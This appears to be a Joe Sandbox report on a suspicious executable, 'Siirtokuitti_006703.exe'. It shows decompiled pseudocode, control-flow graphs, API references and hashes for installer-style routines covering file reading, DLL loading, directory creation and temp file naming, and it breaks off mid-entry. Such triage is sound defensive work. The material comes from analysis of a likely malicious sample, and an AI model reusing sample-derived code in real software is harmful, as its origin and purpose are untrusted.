                                                                                                                      control_flow_graph 704 402644-40265d call 402c15 707 402663-40266a 704->707 708 402abf-402ac2 704->708 709 40266c 707->709 710 40266f-402672 707->710 711 402ac8-402ace 708->711 709->710 712 4027d6-4027de 710->712 713 402678-402687 call 406310 710->713 712->708 713->712 717 40268d 713->717 718 402693-402697 717->718 719 40272c-40272f 718->719 720 40269d-4026b8 ReadFile 718->720 721 402731-402734 719->721 722 402747-402757 call 405f25 719->722 720->712 723 4026be-4026c3 720->723 721->722 724 402736-402741 call 405f83 721->724 722->712 732 402759 722->732 723->712 726 4026c9-4026d7 723->726 724->712 724->722 729 402792-40279e call 4062f7 726->729 730 4026dd-4026ef MultiByteToWideChar 726->730 729->711 730->732 733 4026f1-4026f4 730->733 736 40275c-40275f 732->736 737 4026f6-402701 733->737 736->729 738 402761-402766 736->738 737->736 739 402703-402728 SetFilePointer MultiByteToWideChar 737->739 740 4027a3-4027a7 738->740 741 402768-40276d 738->741 739->737 742 40272a 739->742 743 4027c4-4027d0 SetFilePointer 740->743 744 4027a9-4027ad 740->744 741->740 745 40276f-402782 741->745 742->732 743->712 746 4027b5-4027c2 744->746 747 4027af-4027b3 744->747 745->712 748 402784-40278a 745->748 746->712 747->743 747->746 748->718 749 402790 748->749 749->712
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
                                                                                                                      				intOrPtr _t65;
                                                                                                                      				intOrPtr _t66;
                                                                                                                      				intOrPtr _t72;
                                                                                                                      				void* _t76;
                                                                                                                      				void* _t79;
                                                                                                                      
                                                                                                                      				_t72 = __edx;
                                                                                                                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                                                      				_t65 = 2;
                                                                                                                      				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
                                                                                                                      				_t66 = E00402C15(_t65);
                                                                                                                      				_t79 = _t66 - 1;
                                                                                                                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
                                                                                                                      				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
                                                                                                                      				if(_t79 < 0) {
                                                                                                                      					L36:
                                                                                                                      					 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t76 - 4));
                                                                                                                      				} else {
                                                                                                                      					__ecx = 0x3ff;
                                                                                                                      					if(__eax > 0x3ff) {
                                                                                                                      						 *(__ebp - 0x3c) = 0x3ff;
                                                                                                                      					}
                                                                                                                      					if( *__esi == __bx) {
                                                                                                                      						L34:
                                                                                                                      						__ecx =  *(__ebp - 0xc);
                                                                                                                      						__eax =  *(__ebp - 8);
                                                                                                                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                                                      						if(_t79 == 0) {
                                                                                                                      							 *((intOrPtr*)(_t76 - 4)) = 1;
                                                                                                                      						}
                                                                                                                      						goto L36;
                                                                                                                      					} else {
                                                                                                                      						 *(__ebp - 0x30) = __ebx;
                                                                                                                      						 *(__ebp - 0x10) = E00406310(__ecx, __esi);
                                                                                                                      						if( *(__ebp - 0x3c) > __ebx) {
                                                                                                                      							do {
                                                                                                                      								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
                                                                                                                      									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405F83( *(__ebp - 0x10), __ebx) >= 0) {
                                                                                                                      										__eax = __ebp - 0x44;
                                                                                                                      										if(E00405F25( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
                                                                                                                      											goto L34;
                                                                                                                      										} else {
                                                                                                                      											goto L21;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										goto L34;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eax = __ebp - 0x38;
                                                                                                                      									_push(__ebx);
                                                                                                                      									_push(__ebp - 0x38);
                                                                                                                      									__eax = 2;
                                                                                                                      									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
                                                                                                                      									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
                                                                                                                      									if(__eax == 0) {
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										__ecx =  *(__ebp - 0x38);
                                                                                                                      										if(__ecx == __ebx) {
                                                                                                                      											goto L34;
                                                                                                                      										} else {
                                                                                                                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x48) = __ecx;
                                                                                                                      											 *(__ebp - 0x44) = __eax;
                                                                                                                      											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                                                                      												L28:
                                                                                                                      												__ax & 0x0000ffff = E004062F7( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                                                      											} else {
                                                                                                                      												__ebp - 0x44 = __ebp + 0xa;
                                                                                                                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, ?str?) != 0) {
                                                                                                                      													L21:
                                                                                                                      													__eax =  *(__ebp - 0x44);
                                                                                                                      												} else {
                                                                                                                      													__esi =  *(__ebp - 0x48);
                                                                                                                      													__esi =  ~( *(__ebp - 0x48));
                                                                                                                      													while(1) {
                                                                                                                      														_t22 = __ebp - 0x38;
                                                                                                                      														 *_t22 =  *(__ebp - 0x38) - 1;
                                                                                                                      														__eax = 0xfffd;
                                                                                                                      														 *(__ebp - 0x44) = 0xfffd;
                                                                                                                      														if( *_t22 == 0) {
                                                                                                                      															goto L22;
                                                                                                                      														}
                                                                                                                      														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
                                                                                                                      														__esi = __esi + 1;
                                                                                                                      														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, "true"); // executed
                                                                                                                      														__ebp - 0x44 = __ebp + 0xa;
                                                                                                                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, ?str?) == 0) {
                                                                                                                      															continue;
                                                                                                                      														} else {
                                                                                                                      															goto L21;
                                                                                                                      														}
                                                                                                                      														goto L22;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												L22:
                                                                                                                      												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                                                                      													goto L28;
                                                                                                                      												} else {
                                                                                                                      													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
                                                                                                                      														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                                                      															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
                                                                                                                      															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, "true");
                                                                                                                      														} else {
                                                                                                                      															__ecx =  *(__ebp - 0xc);
                                                                                                                      															__edx =  *(__ebp - 8);
                                                                                                                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                      														}
                                                                                                                      														goto L34;
                                                                                                                      													} else {
                                                                                                                      														__ecx =  *(__ebp - 0xc);
                                                                                                                      														__edx =  *(__ebp - 8);
                                                                                                                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                      														 *(__ebp - 0x30) = __eax;
                                                                                                                      														if(__ax == __bx) {
                                                                                                                      															goto L34;
                                                                                                                      														} else {
                                                                                                                      															goto L26;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L37;
                                                                                                                      								L26:
                                                                                                                      								__eax =  *(__ebp - 8);
                                                                                                                      							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
                                                                                                                      						}
                                                                                                                      						goto L34;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				L37:
                                                                                                                      				return 0;
                                                                                                                      			}








                                                                                                                      0x00402644
                                                                                                                      0x00402646
                                                                                                                      0x00402649
                                                                                                                      0x0040264b
                                                                                                                      0x0040264e
                                                                                                                      0x00402653
                                                                                                                      0x00402657
                                                                                                                      0x0040265a
                                                                                                                      0x0040265d
                                                                                                                      0x00402abf
                                                                                                                      0x00402ac2
                                                                                                                      0x00402663
                                                                                                                      0x00402663
                                                                                                                      0x0040266a
                                                                                                                      0x0040266c
                                                                                                                      0x0040266c
                                                                                                                      0x00402672
                                                                                                                      0x004027d6
                                                                                                                      0x004027d6
                                                                                                                      0x004027d9
                                                                                                                      0x004027de
                                                                                                                      0x004015b6
                                                                                                                      0x00402885
                                                                                                                      0x00402885
                                                                                                                      0x00000000
                                                                                                                      0x00402678
                                                                                                                      0x00402679
                                                                                                                      0x00402684
                                                                                                                      0x00402687
                                                                                                                      0x00402693
                                                                                                                      0x00402697
                                                                                                                      0x0040272f
                                                                                                                      0x00402747
                                                                                                                      0x00402757
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040269d
                                                                                                                      0x0040269d
                                                                                                                      0x004026a0
                                                                                                                      0x004026a1
                                                                                                                      0x004026a4
                                                                                                                      0x004026a9
                                                                                                                      0x004026b0
                                                                                                                      0x004026b8
                                                                                                                      0x00000000
                                                                                                                      0x004026be
                                                                                                                      0x004026be
                                                                                                                      0x004026c3
                                                                                                                      0x00000000
                                                                                                                      0x004026c9
                                                                                                                      0x004026c9
                                                                                                                      0x004026d1
                                                                                                                      0x004026d4
                                                                                                                      0x004026d7
                                                                                                                      0x00402792
                                                                                                                      0x00402799
                                                                                                                      0x004026dd
                                                                                                                      0x004026e3
                                                                                                                      0x004026ef
                                                                                                                      0x00402759
                                                                                                                      0x00402759
                                                                                                                      0x004026f1
                                                                                                                      0x004026f1
                                                                                                                      0x004026f4
                                                                                                                      0x004026f6
                                                                                                                      0x004026f6
                                                                                                                      0x004026f6
                                                                                                                      0x004026f9
                                                                                                                      0x004026fe
                                                                                                                      0x00402701
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00402703
                                                                                                                      0x00402706
                                                                                                                      0x0040270e
                                                                                                                      0x0040271a
                                                                                                                      0x00402728
                                                                                                                      0x00000000
                                                                                                                      0x0040272a
                                                                                                                      0x00000000
                                                                                                                      0x0040272a
                                                                                                                      0x00000000
                                                                                                                      0x00402728
                                                                                                                      0x004026f6
                                                                                                                      0x0040275c
                                                                                                                      0x0040275f
                                                                                                                      0x00000000
                                                                                                                      0x00402761
                                                                                                                      0x00402766
                                                                                                                      0x004027a7
                                                                                                                      0x004027c9
                                                                                                                      0x004027d0
                                                                                                                      0x004027b5
                                                                                                                      0x004027b5
                                                                                                                      0x004027b8
                                                                                                                      0x004027bb
                                                                                                                      0x004027be
                                                                                                                      0x004027be
                                                                                                                      0x00000000
                                                                                                                      0x0040276f
                                                                                                                      0x0040276f
                                                                                                                      0x00402772
                                                                                                                      0x00402775
                                                                                                                      0x0040277b
                                                                                                                      0x0040277f
                                                                                                                      0x00402782
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00402782
                                                                                                                      0x00402766
                                                                                                                      0x0040275f
                                                                                                                      0x004026d7
                                                                                                                      0x004026c3
                                                                                                                      0x004026b8
                                                                                                                      0x00000000
                                                                                                                      0x00402784
                                                                                                                      0x00402784
                                                                                                                      0x00402787
                                                                                                                      0x00402790
                                                                                                                      0x00000000
                                                                                                                      0x00402687
                                                                                                                      0x00402672
                                                                                                                      0x00402ac8
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                                                                                                        • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405F99
                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                      • String ID: 9
                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                      • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                      • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                                                                                      • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                      • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 750 40671a-40673a GetSystemDirectoryW 751 40673c 750->751 752 40673e-406740 750->752 751->752 753 406751-406753 752->753 754 406742-40674b 752->754 756 406754-406787 wsprintfW LoadLibraryExW 753->756 754->753 755 40674d-40674f 754->755 755->756
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0040671A(intOrPtr _a4) {
                                                                                                                      				short _v576;
                                                                                                                      				signed int _t13;
                                                                                                                      				struct HINSTANCE__* _t17;
                                                                                                                      				signed int _t19;
                                                                                                                      				void* _t24;
                                                                                                                      
                                                                                                                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                                                      				if(_t13 > 0x104) {
                                                                                                                      					_t13 = 0;
                                                                                                                      				}
                                                                                                                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                                                      					_t19 = 1;
                                                                                                                      				} else {
                                                                                                                      					_t19 = 0;
                                                                                                                      				}
                                                                                                                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                                                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                                                      				return _t17;
                                                                                                                      			}








                                                                                                                      0x00406731
                                                                                                                      0x0040673a
                                                                                                                      0x0040673c
                                                                                                                      0x0040673c
                                                                                                                      0x00406740
                                                                                                                      0x00406753
                                                                                                                      0x0040674d
                                                                                                                      0x0040674d
                                                                                                                      0x0040674d
                                                                                                                      0x0040676c
                                                                                                                      0x00406780
                                                                                                                      0x00406787

                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                      • wsprintfW.USER32 ref: 0040676C
                                                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                      • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                      • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 757 4058e3-40592e CreateDirectoryW 758 405930-405932 757->758 759 405934-405941 GetLastError 757->759 760 40595b-40595d 758->760 759->760 761 405943-405957 SetFileSecurityW 759->761 761->758 762 405959 GetLastError 761->762 762->760
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E004058E3(WCHAR* _a4) {
                                                                                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                      				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                      				int _t22;
                                                                                                                      				long _t23;
                                                                                                                      
                                                                                                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                      				_v36.Owner = 0x4083f0;
                                                                                                                      				_v36.Group = 0x4083f0;
                                                                                                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                      				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                      				_v36.Revision = 1;
                                                                                                                      				_v36.Control = 4;
                                                                                                                      				_v36.Dacl = 0x4083e0;
                                                                                                                      				_v16.nLength = 0xc;
                                                                                                                      				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                                                      				if(_t22 != 0) {
                                                                                                                      					L1:
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				_t23 = GetLastError();
                                                                                                                      				if(_t23 == 0xb7) {
                                                                                                                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					return GetLastError();
                                                                                                                      				}
                                                                                                                      				return _t23;
                                                                                                                      			}







                                                                                                                      0x004058ee
                                                                                                                      0x004058f2
                                                                                                                      0x004058f5
                                                                                                                      0x004058fb
                                                                                                                      0x004058ff
                                                                                                                      0x00405903
                                                                                                                      0x0040590b
                                                                                                                      0x00405912
                                                                                                                      0x00405918
                                                                                                                      0x0040591f
                                                                                                                      0x00405926
                                                                                                                      0x0040592e
                                                                                                                      0x00405930
                                                                                                                      0x00000000
                                                                                                                      0x00405930
                                                                                                                      0x0040593a
                                                                                                                      0x00405941
                                                                                                                      0x00405957
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405959
                                                                                                                      0x0040595d

                                                                                                                      APIs
                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                      • GetLastError.KERNEL32 ref: 0040593A
                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                                                                                      • GetLastError.KERNEL32 ref: 00405959
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                      • API String ID: 3449924974-3370423016
                                                                                                                      • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                      • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                                                                                      • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                      • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 763 405ed1-405edd 764 405ede-405f12 GetTickCount GetTempFileNameW 763->764 765 405f21-405f23 764->765 766 405f14-405f16 764->766 767 405f1b-405f1e 765->767 766->764 768 405f18 766->768 768->767
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405ED1(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				short _v12;
                                                                                                                      				short _t12;
                                                                                                                      				intOrPtr _t13;
                                                                                                                      				signed int _t14;
                                                                                                                      				WCHAR* _t17;
                                                                                                                      				signed int _t19;
                                                                                                                      				signed short _t23;
                                                                                                                      				WCHAR* _t26;
                                                                                                                      
                                                                                                                      				_t26 = _a4;
                                                                                                                      				_t23 = 0x64;
                                                                                                                      				while(1) {
                                                                                                                      					_t12 =  *L"nsa"; // 0x73006e
                                                                                                                      					_t23 = _t23 - 1;
                                                                                                                      					_v12 = _t12;
                                                                                                                      					_t13 =  *0x40a58c; // 0x61
                                                                                                                      					_v8 = _t13;
                                                                                                                      					_t14 = GetTickCount();
                                                                                                                      					_t19 = 0x1a;
                                                                                                                      					_v8 = _v8 + _t14 % _t19;
                                                                                                                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                                                      					if(_t17 != 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if(_t23 != 0) {
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						 *_t26 =  *_t26 & _t23;
                                                                                                                      					}
                                                                                                                      					L4:
                                                                                                                      					return _t17;
                                                                                                                      				}
                                                                                                                      				_t17 = _t26;
                                                                                                                      				goto L4;
                                                                                                                      			}












                                                                                                                      0x00405ed7
                                                                                                                      0x00405edd
                                                                                                                      0x00405ede
                                                                                                                      0x00405ede
                                                                                                                      0x00405ee3
                                                                                                                      0x00405ee4
                                                                                                                      0x00405ee7
                                                                                                                      0x00405eec
                                                                                                                      0x00405eef
                                                                                                                      0x00405ef9
                                                                                                                      0x00405f06
                                                                                                                      0x00405f0a
                                                                                                                      0x00405f12
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405f16
                                                                                                                      0x00000000
                                                                                                                      0x00405f18
                                                                                                                      0x00405f18
                                                                                                                      0x00405f18
                                                                                                                      0x00405f1b
                                                                                                                      0x00405f1e
                                                                                                                      0x00405f1e
                                                                                                                      0x00405f21
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EEF
                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75833420,004036D5), ref: 00405F0A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                      • String ID: "C:\Users\user\Desktop\Siirtokuitti_006703.exe"$C:\Users\user\AppData\Local\Temp\$nsa
